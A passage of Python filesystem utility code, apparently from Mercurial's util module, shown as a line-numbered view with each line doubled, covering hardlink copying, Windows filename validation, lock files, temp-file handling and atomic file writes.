1742 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1742 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1743 os.stat(os.path.dirname(dst)).st_dev)
1743 os.stat(os.path.dirname(dst)).st_dev)
1744 settopic()
1744 settopic()
1745
1745
1746 if hardlink:
1746 if hardlink:
1747 try:
1747 try:
1748 oslink(src, dst)
1748 oslink(src, dst)
1749 except (IOError, OSError):
1749 except (IOError, OSError):
1750 hardlink = False
1750 hardlink = False
1751 shutil.copy(src, dst)
1751 shutil.copy(src, dst)
1752 else:
1752 else:
1753 shutil.copy(src, dst)
1753 shutil.copy(src, dst)
1754 num += 1
1754 num += 1
1755 if progress:
1755 if progress:
1756 progress.increment()
1756 progress.increment()
1757
1757
1758 return hardlink, num
1758 return hardlink, num
1759
1759
1760 _winreservednames = {
1760 _winreservednames = {
1761 'con', 'prn', 'aux', 'nul',
1761 'con', 'prn', 'aux', 'nul',
1762 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1762 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1763 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1763 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1764 }
1764 }
1765 _winreservedchars = ':*?"<>|'
1765 _winreservedchars = ':*?"<>|'
1766 def checkwinfilename(path):
1766 def checkwinfilename(path):
1767 r'''Check that the base-relative path is a valid filename on Windows.
1767 r'''Check that the base-relative path is a valid filename on Windows.
1768 Returns None if the path is ok, or a UI string describing the problem.
1768 Returns None if the path is ok, or a UI string describing the problem.
1769
1769
1770 >>> checkwinfilename(b"just/a/normal/path")
1770 >>> checkwinfilename(b"just/a/normal/path")
1771 >>> checkwinfilename(b"foo/bar/con.xml")
1771 >>> checkwinfilename(b"foo/bar/con.xml")
1772 "filename contains 'con', which is reserved on Windows"
1772 "filename contains 'con', which is reserved on Windows"
1773 >>> checkwinfilename(b"foo/con.xml/bar")
1773 >>> checkwinfilename(b"foo/con.xml/bar")
1774 "filename contains 'con', which is reserved on Windows"
1774 "filename contains 'con', which is reserved on Windows"
1775 >>> checkwinfilename(b"foo/bar/xml.con")
1775 >>> checkwinfilename(b"foo/bar/xml.con")
1776 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1776 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1777 "filename contains 'AUX', which is reserved on Windows"
1777 "filename contains 'AUX', which is reserved on Windows"
1778 >>> checkwinfilename(b"foo/bar/bla:.txt")
1778 >>> checkwinfilename(b"foo/bar/bla:.txt")
1779 "filename contains ':', which is reserved on Windows"
1779 "filename contains ':', which is reserved on Windows"
1780 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1780 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1781 "filename contains '\\x07', which is invalid on Windows"
1781 "filename contains '\\x07', which is invalid on Windows"
1782 >>> checkwinfilename(b"foo/bar/bla ")
1782 >>> checkwinfilename(b"foo/bar/bla ")
1783 "filename ends with ' ', which is not allowed on Windows"
1783 "filename ends with ' ', which is not allowed on Windows"
1784 >>> checkwinfilename(b"../bar")
1784 >>> checkwinfilename(b"../bar")
1785 >>> checkwinfilename(b"foo\\")
1785 >>> checkwinfilename(b"foo\\")
1786 "filename ends with '\\', which is invalid on Windows"
1786 "filename ends with '\\', which is invalid on Windows"
1787 >>> checkwinfilename(b"foo\\/bar")
1787 >>> checkwinfilename(b"foo\\/bar")
1788 "directory name ends with '\\', which is invalid on Windows"
1788 "directory name ends with '\\', which is invalid on Windows"
1789 '''
1789 '''
1790 if path.endswith('\\'):
1790 if path.endswith('\\'):
1791 return _("filename ends with '\\', which is invalid on Windows")
1791 return _("filename ends with '\\', which is invalid on Windows")
1792 if '\\/' in path:
1792 if '\\/' in path:
1793 return _("directory name ends with '\\', which is invalid on Windows")
1793 return _("directory name ends with '\\', which is invalid on Windows")
1794 for n in path.replace('\\', '/').split('/'):
1794 for n in path.replace('\\', '/').split('/'):
1795 if not n:
1795 if not n:
1796 continue
1796 continue
1797 for c in _filenamebytestr(n):
1797 for c in _filenamebytestr(n):
1798 if c in _winreservedchars:
1798 if c in _winreservedchars:
1799 return _("filename contains '%s', which is reserved "
1799 return _("filename contains '%s', which is reserved "
1800 "on Windows") % c
1800 "on Windows") % c
1801 if ord(c) <= 31:
1801 if ord(c) <= 31:
1802 return _("filename contains '%s', which is invalid "
1802 return _("filename contains '%s', which is invalid "
1803 "on Windows") % stringutil.escapestr(c)
1803 "on Windows") % stringutil.escapestr(c)
1804 base = n.split('.')[0]
1804 base = n.split('.')[0]
1805 if base and base.lower() in _winreservednames:
1805 if base and base.lower() in _winreservednames:
1806 return _("filename contains '%s', which is reserved "
1806 return _("filename contains '%s', which is reserved "
1807 "on Windows") % base
1807 "on Windows") % base
1808 t = n[-1:]
1808 t = n[-1:]
1809 if t in '. ' and n not in '..':
1809 if t in '. ' and n not in '..':
1810 return _("filename ends with '%s', which is not allowed "
1810 return _("filename ends with '%s', which is not allowed "
1811 "on Windows") % t
1811 "on Windows") % t
1812
1812
1813 if pycompat.iswindows:
1813 if pycompat.iswindows:
1814 checkosfilename = checkwinfilename
1814 checkosfilename = checkwinfilename
1815 timer = time.clock
1815 timer = time.clock
1816 else:
1816 else:
1817 checkosfilename = platform.checkosfilename
1817 checkosfilename = platform.checkosfilename
1818 timer = time.time
1818 timer = time.time
1819
1819
1820 if safehasattr(time, "perf_counter"):
1820 if safehasattr(time, "perf_counter"):
1821 timer = time.perf_counter
1821 timer = time.perf_counter
1822
1822
1823 def makelock(info, pathname):
1823 def makelock(info, pathname):
1824 """Create a lock file atomically if possible
1824 """Create a lock file atomically if possible
1825
1825
1826 This may leave a stale lock file if symlink isn't supported and signal
1826 This may leave a stale lock file if symlink isn't supported and signal
1827 interrupt is enabled.
1827 interrupt is enabled.
1828 """
1828 """
1829 try:
1829 try:
1830 return os.symlink(info, pathname)
1830 return os.symlink(info, pathname)
1831 except OSError as why:
1831 except OSError as why:
1832 if why.errno == errno.EEXIST:
1832 if why.errno == errno.EEXIST:
1833 raise
1833 raise
1834 except AttributeError: # no symlink in os
1834 except AttributeError: # no symlink in os
1835 pass
1835 pass
1836
1836
1837 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1837 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1838 ld = os.open(pathname, flags)
1838 ld = os.open(pathname, flags)
1839 os.write(ld, info)
1839 os.write(ld, info)
1840 os.close(ld)
1840 os.close(ld)
1841
1841
1842 def readlock(pathname):
1842 def readlock(pathname):
1843 try:
1843 try:
1844 return os.readlink(pathname)
1844 return os.readlink(pathname)
1845 except OSError as why:
1845 except OSError as why:
1846 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1846 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1847 raise
1847 raise
1848 except AttributeError: # no symlink in os
1848 except AttributeError: # no symlink in os
1849 pass
1849 pass
1850 fp = posixfile(pathname, 'rb')
1850 fp = posixfile(pathname, 'rb')
1851 r = fp.read()
1851 r = fp.read()
1852 fp.close()
1852 fp.close()
1853 return r
1853 return r
1854
1854
1855 def fstat(fp):
1855 def fstat(fp):
1856 '''stat file object that may not have fileno method.'''
1856 '''stat file object that may not have fileno method.'''
1857 try:
1857 try:
1858 return os.fstat(fp.fileno())
1858 return os.fstat(fp.fileno())
1859 except AttributeError:
1859 except AttributeError:
1860 return os.stat(fp.name)
1860 return os.stat(fp.name)
1861
1861
1862 # File system features
1862 # File system features
1863
1863
1864 def fscasesensitive(path):
1864 def fscasesensitive(path):
1865 """
1865 """
1866 Return true if the given path is on a case-sensitive filesystem
1866 Return true if the given path is on a case-sensitive filesystem
1867
1867
1868 Requires a path (like /foo/.hg) ending with a foldable final
1868 Requires a path (like /foo/.hg) ending with a foldable final
1869 directory component.
1869 directory component.
1870 """
1870 """
1871 s1 = os.lstat(path)
1871 s1 = os.lstat(path)
1872 d, b = os.path.split(path)
1872 d, b = os.path.split(path)
1873 b2 = b.upper()
1873 b2 = b.upper()
1874 if b == b2:
1874 if b == b2:
1875 b2 = b.lower()
1875 b2 = b.lower()
1876 if b == b2:
1876 if b == b2:
1877 return True # no evidence against case sensitivity
1877 return True # no evidence against case sensitivity
1878 p2 = os.path.join(d, b2)
1878 p2 = os.path.join(d, b2)
1879 try:
1879 try:
1880 s2 = os.lstat(p2)
1880 s2 = os.lstat(p2)
1881 if s2 == s1:
1881 if s2 == s1:
1882 return False
1882 return False
1883 return True
1883 return True
1884 except OSError:
1884 except OSError:
1885 return True
1885 return True
1886
1886
1887 try:
1887 try:
1888 import re2
1888 import re2
1889 _re2 = None
1889 _re2 = None
1890 except ImportError:
1890 except ImportError:
1891 _re2 = False
1891 _re2 = False
1892
1892
1893 class _re(object):
1893 class _re(object):
1894 def _checkre2(self):
1894 def _checkre2(self):
1895 global _re2
1895 global _re2
1896 try:
1896 try:
1897 # check if match works, see issue3964
1897 # check if match works, see issue3964
1898 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1898 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1899 except ImportError:
1899 except ImportError:
1900 _re2 = False
1900 _re2 = False
1901
1901
1902 def compile(self, pat, flags=0):
1902 def compile(self, pat, flags=0):
1903 '''Compile a regular expression, using re2 if possible
1903 '''Compile a regular expression, using re2 if possible
1904
1904
1905 For best performance, use only re2-compatible regexp features. The
1905 For best performance, use only re2-compatible regexp features. The
1906 only flags from the re module that are re2-compatible are
1906 only flags from the re module that are re2-compatible are
1907 IGNORECASE and MULTILINE.'''
1907 IGNORECASE and MULTILINE.'''
1908 if _re2 is None:
1908 if _re2 is None:
1909 self._checkre2()
1909 self._checkre2()
1910 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1910 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1911 if flags & remod.IGNORECASE:
1911 if flags & remod.IGNORECASE:
1912 pat = '(?i)' + pat
1912 pat = '(?i)' + pat
1913 if flags & remod.MULTILINE:
1913 if flags & remod.MULTILINE:
1914 pat = '(?m)' + pat
1914 pat = '(?m)' + pat
1915 try:
1915 try:
1916 return re2.compile(pat)
1916 return re2.compile(pat)
1917 except re2.error:
1917 except re2.error:
1918 pass
1918 pass
1919 return remod.compile(pat, flags)
1919 return remod.compile(pat, flags)
1920
1920
1921 @propertycache
1921 @propertycache
1922 def escape(self):
1922 def escape(self):
1923 '''Return the version of escape corresponding to self.compile.
1923 '''Return the version of escape corresponding to self.compile.
1924
1924
1925 This is imperfect because whether re2 or re is used for a particular
1925 This is imperfect because whether re2 or re is used for a particular
1926 function depends on the flags, etc, but it's the best we can do.
1926 function depends on the flags, etc, but it's the best we can do.
1927 '''
1927 '''
1928 global _re2
1928 global _re2
1929 if _re2 is None:
1929 if _re2 is None:
1930 self._checkre2()
1930 self._checkre2()
1931 if _re2:
1931 if _re2:
1932 return re2.escape
1932 return re2.escape
1933 else:
1933 else:
1934 return remod.escape
1934 return remod.escape
1935
1935
1936 re = _re()
1936 re = _re()
1937
1937
1938 _fspathcache = {}
1938 _fspathcache = {}
1939 def fspath(name, root):
1939 def fspath(name, root):
1940 '''Get name in the case stored in the filesystem
1940 '''Get name in the case stored in the filesystem
1941
1941
1942 The name should be relative to root, and be normcase-ed for efficiency.
1942 The name should be relative to root, and be normcase-ed for efficiency.
1943
1943
1944 Note that this function is unnecessary, and should not be
1944 Note that this function is unnecessary, and should not be
1945 called, for case-sensitive filesystems (simply because it's expensive).
1945 called, for case-sensitive filesystems (simply because it's expensive).
1946
1946
1947 The root should be normcase-ed, too.
1947 The root should be normcase-ed, too.
1948 '''
1948 '''
1949 def _makefspathcacheentry(dir):
1949 def _makefspathcacheentry(dir):
1950 return dict((normcase(n), n) for n in os.listdir(dir))
1950 return dict((normcase(n), n) for n in os.listdir(dir))
1951
1951
1952 seps = pycompat.ossep
1952 seps = pycompat.ossep
1953 if pycompat.osaltsep:
1953 if pycompat.osaltsep:
1954 seps = seps + pycompat.osaltsep
1954 seps = seps + pycompat.osaltsep
1955 # Protect backslashes. This gets silly very quickly.
1955 # Protect backslashes. This gets silly very quickly.
1956 seps.replace('\\','\\\\')
1956 seps.replace('\\','\\\\')
1957 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1957 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1958 dir = os.path.normpath(root)
1958 dir = os.path.normpath(root)
1959 result = []
1959 result = []
1960 for part, sep in pattern.findall(name):
1960 for part, sep in pattern.findall(name):
1961 if sep:
1961 if sep:
1962 result.append(sep)
1962 result.append(sep)
1963 continue
1963 continue
1964
1964
1965 if dir not in _fspathcache:
1965 if dir not in _fspathcache:
1966 _fspathcache[dir] = _makefspathcacheentry(dir)
1966 _fspathcache[dir] = _makefspathcacheentry(dir)
1967 contents = _fspathcache[dir]
1967 contents = _fspathcache[dir]
1968
1968
1969 found = contents.get(part)
1969 found = contents.get(part)
1970 if not found:
1970 if not found:
1971 # retry "once per directory" per "dirstate.walk" which
1971 # retry "once per directory" per "dirstate.walk" which
1972 # may take place for each patches of "hg qpush", for example
1972 # may take place for each patches of "hg qpush", for example
1973 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1973 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1974 found = contents.get(part)
1974 found = contents.get(part)
1975
1975
1976 result.append(found or part)
1976 result.append(found or part)
1977 dir = os.path.join(dir, part)
1977 dir = os.path.join(dir, part)
1978
1978
1979 return ''.join(result)
1979 return ''.join(result)
1980
1980
1981 def checknlink(testfile):
1981 def checknlink(testfile):
1982 '''check whether hardlink count reporting works properly'''
1982 '''check whether hardlink count reporting works properly'''
1983
1983
1984 # testfile may be open, so we need a separate file for checking to
1984 # testfile may be open, so we need a separate file for checking to
1985 # work around issue2543 (or testfile may get lost on Samba shares)
1985 # work around issue2543 (or testfile may get lost on Samba shares)
1986 f1, f2, fp = None, None, None
1986 f1, f2, fp = None, None, None
1987 try:
1987 try:
1988 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1988 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1989 suffix='1~', dir=os.path.dirname(testfile))
1989 suffix='1~', dir=os.path.dirname(testfile))
1990 os.close(fd)
1990 os.close(fd)
1991 f2 = '%s2~' % f1[:-2]
1991 f2 = '%s2~' % f1[:-2]
1992
1992
1993 oslink(f1, f2)
1993 oslink(f1, f2)
1994 # nlinks() may behave differently for files on Windows shares if
1994 # nlinks() may behave differently for files on Windows shares if
1995 # the file is open.
1995 # the file is open.
1996 fp = posixfile(f2)
1996 fp = posixfile(f2)
1997 return nlinks(f2) > 1
1997 return nlinks(f2) > 1
1998 except OSError:
1998 except OSError:
1999 return False
1999 return False
2000 finally:
2000 finally:
2001 if fp is not None:
2001 if fp is not None:
2002 fp.close()
2002 fp.close()
2003 for f in (f1, f2):
2003 for f in (f1, f2):
2004 try:
2004 try:
2005 if f is not None:
2005 if f is not None:
2006 os.unlink(f)
2006 os.unlink(f)
2007 except OSError:
2007 except OSError:
2008 pass
2008 pass
2009
2009
2010 def endswithsep(path):
2010 def endswithsep(path):
2011 '''Check path ends with os.sep or os.altsep.'''
2011 '''Check path ends with os.sep or os.altsep.'''
2012 return (path.endswith(pycompat.ossep)
2012 return (path.endswith(pycompat.ossep)
2013 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2013 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2014
2014
2015 def splitpath(path):
2015 def splitpath(path):
2016 '''Split path by os.sep.
2016 '''Split path by os.sep.
2017 Note that this function does not use os.altsep because this is
2017 Note that this function does not use os.altsep because this is
2018 an alternative of simple "xxx.split(os.sep)".
2018 an alternative of simple "xxx.split(os.sep)".
2019 It is recommended to use os.path.normpath() before using this
2019 It is recommended to use os.path.normpath() before using this
2020 function if need.'''
2020 function if need.'''
2021 return path.split(pycompat.ossep)
2021 return path.split(pycompat.ossep)
2022
2022
2023 def mktempcopy(name, emptyok=False, createmode=None):
2023 def mktempcopy(name, emptyok=False, createmode=None):
2024 """Create a temporary file with the same contents from name
2024 """Create a temporary file with the same contents from name
2025
2025
2026 The permission bits are copied from the original file.
2026 The permission bits are copied from the original file.
2027
2027
2028 If the temporary file is going to be truncated immediately, you
2028 If the temporary file is going to be truncated immediately, you
2029 can use emptyok=True as an optimization.
2029 can use emptyok=True as an optimization.
2030
2030
2031 Returns the name of the temporary file.
2031 Returns the name of the temporary file.
2032 """
2032 """
2033 d, fn = os.path.split(name)
2033 d, fn = os.path.split(name)
2034 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2034 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2035 os.close(fd)
2035 os.close(fd)
2036 # Temporary files are created with mode 0600, which is usually not
2036 # Temporary files are created with mode 0600, which is usually not
2037 # what we want. If the original file already exists, just copy
2037 # what we want. If the original file already exists, just copy
2038 # its mode. Otherwise, manually obey umask.
2038 # its mode. Otherwise, manually obey umask.
2039 copymode(name, temp, createmode)
2039 copymode(name, temp, createmode)
2040 if emptyok:
2040 if emptyok:
2041 return temp
2041 return temp
2042 try:
2042 try:
2043 try:
2043 try:
2044 ifp = posixfile(name, "rb")
2044 ifp = posixfile(name, "rb")
2045 except IOError as inst:
2045 except IOError as inst:
2046 if inst.errno == errno.ENOENT:
2046 if inst.errno == errno.ENOENT:
2047 return temp
2047 return temp
2048 if not getattr(inst, 'filename', None):
2048 if not getattr(inst, 'filename', None):
2049 inst.filename = name
2049 inst.filename = name
2050 raise
2050 raise
2051 ofp = posixfile(temp, "wb")
2051 ofp = posixfile(temp, "wb")
2052 for chunk in filechunkiter(ifp):
2052 for chunk in filechunkiter(ifp):
2053 ofp.write(chunk)
2053 ofp.write(chunk)
2054 ifp.close()
2054 ifp.close()
2055 ofp.close()
2055 ofp.close()
2056 except: # re-raises
2056 except: # re-raises
2057 try:
2057 try:
2058 os.unlink(temp)
2058 os.unlink(temp)
2059 except OSError:
2059 except OSError:
2060 pass
2060 pass
2061 raise
2061 raise
2062 return temp
2062 return temp
2063
2063
2064 class filestat(object):
2064 class filestat(object):
2065 """help to exactly detect change of a file
2065 """help to exactly detect change of a file
2066
2066
2067 'stat' attribute is result of 'os.stat()' if specified 'path'
2067 'stat' attribute is result of 'os.stat()' if specified 'path'
2068 exists. Otherwise, it is None. This can avoid preparative
2068 exists. Otherwise, it is None. This can avoid preparative
2069 'exists()' examination on client side of this class.
2069 'exists()' examination on client side of this class.
2070 """
2070 """
2071 def __init__(self, stat):
2071 def __init__(self, stat):
2072 self.stat = stat
2072 self.stat = stat
2073
2073
2074 @classmethod
2074 @classmethod
2075 def frompath(cls, path):
2075 def frompath(cls, path):
2076 try:
2076 try:
2077 stat = os.stat(path)
2077 stat = os.stat(path)
2078 except OSError as err:
2078 except OSError as err:
2079 if err.errno != errno.ENOENT:
2079 if err.errno != errno.ENOENT:
2080 raise
2080 raise
2081 stat = None
2081 stat = None
2082 return cls(stat)
2082 return cls(stat)
2083
2083
2084 @classmethod
2084 @classmethod
2085 def fromfp(cls, fp):
2085 def fromfp(cls, fp):
2086 stat = os.fstat(fp.fileno())
2086 stat = os.fstat(fp.fileno())
2087 return cls(stat)
2087 return cls(stat)
2088
2088
2089 __hash__ = object.__hash__
2089 __hash__ = object.__hash__
2090
2090
2091 def __eq__(self, old):
2091 def __eq__(self, old):
2092 try:
2092 try:
2093 # if ambiguity between stat of new and old file is
2093 # if ambiguity between stat of new and old file is
2094 # avoided, comparison of size, ctime and mtime is enough
2094 # avoided, comparison of size, ctime and mtime is enough
2095 # to exactly detect change of a file regardless of platform
2095 # to exactly detect change of a file regardless of platform
2096 return (self.stat.st_size == old.stat.st_size and
2096 return (self.stat.st_size == old.stat.st_size and
2097 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2097 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2098 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2098 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2099 except AttributeError:
2099 except AttributeError:
2100 pass
2100 pass
2101 try:
2101 try:
2102 return self.stat is None and old.stat is None
2102 return self.stat is None and old.stat is None
2103 except AttributeError:
2103 except AttributeError:
2104 return False
2104 return False
2105
2105
2106 def isambig(self, old):
2106 def isambig(self, old):
2107 """Examine whether new (= self) stat is ambiguous against old one
2107 """Examine whether new (= self) stat is ambiguous against old one
2108
2108
2109 "S[N]" below means stat of a file at N-th change:
2109 "S[N]" below means stat of a file at N-th change:
2110
2110
2111 - S[n-1].ctime < S[n].ctime: can detect change of a file
2111 - S[n-1].ctime < S[n].ctime: can detect change of a file
2112 - S[n-1].ctime == S[n].ctime
2112 - S[n-1].ctime == S[n].ctime
2113 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2113 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2114 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2114 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2115 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2115 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2116 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2116 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2117
2117
2118 Case (*2) above means that a file was changed twice or more at
2118 Case (*2) above means that a file was changed twice or more at
2119 same time in sec (= S[n-1].ctime), and comparison of timestamp
2119 same time in sec (= S[n-1].ctime), and comparison of timestamp
2120 is ambiguous.
2120 is ambiguous.
2121
2121
2122 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2122 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2123 timestamp is ambiguous".
2123 timestamp is ambiguous".
2124
2124
2125 But advancing mtime only in case (*2) doesn't work as
2125 But advancing mtime only in case (*2) doesn't work as
2126 expected, because naturally advanced S[n].mtime in case (*1)
2126 expected, because naturally advanced S[n].mtime in case (*1)
2127 might be equal to manually advanced S[n-1 or earlier].mtime.
2127 might be equal to manually advanced S[n-1 or earlier].mtime.
2128
2128
2129 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2129 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2130 treated as ambiguous regardless of mtime, to avoid overlooking
2130 treated as ambiguous regardless of mtime, to avoid overlooking
2131 by confliction between such mtime.
2131 by confliction between such mtime.
2132
2132
2133 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2133 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2134 S[n].mtime", even if size of a file isn't changed.
2134 S[n].mtime", even if size of a file isn't changed.
2135 """
2135 """
2136 try:
2136 try:
2137 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2137 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2138 except AttributeError:
2138 except AttributeError:
2139 return False
2139 return False
2140
2140
2141 def avoidambig(self, path, old):
2141 def avoidambig(self, path, old):
2142 """Change file stat of specified path to avoid ambiguity
2142 """Change file stat of specified path to avoid ambiguity
2143
2143
2144 'old' should be previous filestat of 'path'.
2144 'old' should be previous filestat of 'path'.
2145
2145
2146 This skips avoiding ambiguity, if a process doesn't have
2146 This skips avoiding ambiguity, if a process doesn't have
2147 appropriate privileges for 'path'. This returns False in this
2147 appropriate privileges for 'path'. This returns False in this
2148 case.
2148 case.
2149
2149
2150 Otherwise, this returns True, as "ambiguity is avoided".
2150 Otherwise, this returns True, as "ambiguity is avoided".
2151 """
2151 """
2152 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2152 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2153 try:
2153 try:
2154 os.utime(path, (advanced, advanced))
2154 os.utime(path, (advanced, advanced))
2155 except OSError as inst:
2155 except OSError as inst:
2156 if inst.errno == errno.EPERM:
2156 if inst.errno == errno.EPERM:
2157 # utime() on the file created by another user causes EPERM,
2157 # utime() on the file created by another user causes EPERM,
2158 # if a process doesn't have appropriate privileges
2158 # if a process doesn't have appropriate privileges
2159 return False
2159 return False
2160 raise
2160 raise
2161 return True
2161 return True
2162
2162
2163 def __ne__(self, other):
2163 def __ne__(self, other):
2164 return not self == other
2164 return not self == other
2165
2165
2166 class atomictempfile(object):
2166 class atomictempfile(object):
2167 '''writable file object that atomically updates a file
2167 '''writable file object that atomically updates a file
2168
2168
2169 All writes will go to a temporary copy of the original file. Call
2169 All writes will go to a temporary copy of the original file. Call
2170 close() when you are done writing, and atomictempfile will rename
2170 close() when you are done writing, and atomictempfile will rename
2171 the temporary copy to the original name, making the changes
2171 the temporary copy to the original name, making the changes
2172 visible. If the object is destroyed without being closed, all your
2172 visible. If the object is destroyed without being closed, all your
2173 writes are discarded.
2173 writes are discarded.
2174
2174
2175 checkambig argument of constructor is used with filestat, and is
2175 checkambig argument of constructor is used with filestat, and is
2176 useful only if target file is guarded by any lock (e.g. repo.lock
2176 useful only if target file is guarded by any lock (e.g. repo.lock
2177 or repo.wlock).
2177 or repo.wlock).
2178 '''
2178 '''
2179 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2179 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2180 self.__name = name # permanent name
2180 self.__name = name # permanent name
2181 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2181 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2182 createmode=createmode)
2182 createmode=createmode)
2183 self._fp = posixfile(self._tempname, mode)
2183 self._fp = posixfile(self._tempname, mode)
2184 self._checkambig = checkambig
2184 self._checkambig = checkambig
2185
2185
2186 # delegated methods
2186 # delegated methods
2187 self.read = self._fp.read
2187 self.read = self._fp.read
2188 self.write = self._fp.write
2188 self.write = self._fp.write
2189 self.seek = self._fp.seek
2189 self.seek = self._fp.seek
2190 self.tell = self._fp.tell
2190 self.tell = self._fp.tell
2191 self.fileno = self._fp.fileno
2191 self.fileno = self._fp.fileno
2192
2192
2193 def close(self):
2193 def close(self):
2194 if not self._fp.closed:
2194 if not self._fp.closed:
2195 self._fp.close()
2195 self._fp.close()
2196 filename = localpath(self.__name)
2196 filename = localpath(self.__name)
2197 oldstat = self._checkambig and filestat.frompath(filename)
2197 oldstat = self._checkambig and filestat.frompath(filename)
2198 if oldstat and oldstat.stat:
2198 if oldstat and oldstat.stat:
2199 rename(self._tempname, filename)
2199 rename(self._tempname, filename)
2200 newstat = filestat.frompath(filename)
2200 newstat = filestat.frompath(filename)
2201 if newstat.isambig(oldstat):
2201 if newstat.isambig(oldstat):
2202 # stat of changed file is ambiguous to original one
2202 # stat of changed file is ambiguous to original one
2203 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2203 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2204 os.utime(filename, (advanced, advanced))
2204 os.utime(filename, (advanced, advanced))
2205 else:
2205 else:
2206 rename(self._tempname, filename)
2206 rename(self._tempname, filename)
2207
2207
2208 def discard(self):
2208 def discard(self):
2209 if not self._fp.closed:
2209 if not self._fp.closed:
2210 try:
2210 try:
2211 os.unlink(self._tempname)
2211 os.unlink(self._tempname)
2212 except OSError:
2212 except OSError:
2213 pass
2213 pass
2214 self._fp.close()
2214 self._fp.close()
2215
2215
2216 def __del__(self):
2216 def __del__(self):
2217 if safehasattr(self, '_fp'): # constructor actually did something
2217 if safehasattr(self, '_fp'): # constructor actually did something
2218 self.discard()
2218 self.discard()
2219
2219
2220 def __enter__(self):
2220 def __enter__(self):
2221 return self
2221 return self
2222
2222
2223 def __exit__(self, exctype, excvalue, traceback):
2223 def __exit__(self, exctype, excvalue, traceback):
2224 if exctype is not None:
2224 if exctype is not None:
2225 self.discard()
2225 self.discard()
2226 else:
2226 else:
2227 self.close()
2227 self.close()
2228
2228
2229 def unlinkpath(f, ignoremissing=False, rmdir=True):
2229 def unlinkpath(f, ignoremissing=False, rmdir=True):
2230 """unlink and remove the directory if it is empty"""
2230 """unlink and remove the directory if it is empty"""
2231 if ignoremissing:
2231 if ignoremissing:
2232 tryunlink(f)
2232 tryunlink(f)
2233 else:
2233 else:
2234 unlink(f)
2234 unlink(f)
2235 if rmdir:
2235 if rmdir:
2236 # try removing directories that might now be empty
2236 # try removing directories that might now be empty
2237 try:
2237 try:
2238 removedirs(os.path.dirname(f))
2238 removedirs(os.path.dirname(f))
2239 except OSError:
2239 except OSError:
2240 pass
2240 pass
2241
2241
2242 def tryunlink(f):
2242 def tryunlink(f):
2243 """Attempt to remove a file, ignoring ENOENT errors."""
2243 """Attempt to remove a file, ignoring ENOENT errors."""
2244 try:
2244 try:
2245 unlink(f)
2245 unlink(f)
2246 except OSError as e:
2246 except OSError as e:
2247 if e.errno != errno.ENOENT:
2247 if e.errno != errno.ENOENT:
2248 raise
2248 raise
2249
2249
2250 def makedirs(name, mode=None, notindexed=False):
2250 def makedirs(name, mode=None, notindexed=False):
2251 """recursive directory creation with parent mode inheritance
2251 """recursive directory creation with parent mode inheritance
2252
2252
2253 Newly created directories are marked as "not to be indexed by
2253 Newly created directories are marked as "not to be indexed by
2254 the content indexing service", if ``notindexed`` is specified
2254 the content indexing service", if ``notindexed`` is specified
2255 for "write" mode access.
2255 for "write" mode access.
2256 """
2256 """
2257 try:
2257 try:
